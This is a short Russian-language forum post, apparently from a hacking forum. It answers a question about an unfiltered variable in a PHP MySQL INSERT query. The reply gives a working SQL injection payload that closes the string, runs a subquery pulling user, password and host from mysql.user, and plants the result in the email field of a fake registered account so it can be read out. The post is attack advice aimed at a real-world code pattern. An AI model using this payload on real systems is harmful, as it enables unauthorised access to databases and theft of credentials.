18.03.2009, 21:12
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Сообщение от Велемир
http://pastebin.com/m19eaa637
Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?
PHP код:
$result = mysql_query("INSERT INTO Users
(firstname,lastname,school_id,description,email,username,password)
VALUES
('$firstname','$lastname','$school_id','$form_number','$email','$username',
Password('$password'))");
если $form_number уязвима и MySQL поддерживает подзапросы + кавычки не слешируються то можешь зделать своеобразный вывод в пользовательских профиле(естественно это имеет смысл еслу тебя есть доступ к данным пользователя), то есть что то типо такого:
$form_number = 1',(select concat_ws(0x3a,user,password,host) from mysql.user limit 1),'dodik','pass' /*
потом ишешь пользователя dodik и по идее у него в мыли будет лежать наш подзапрос.
|
|
|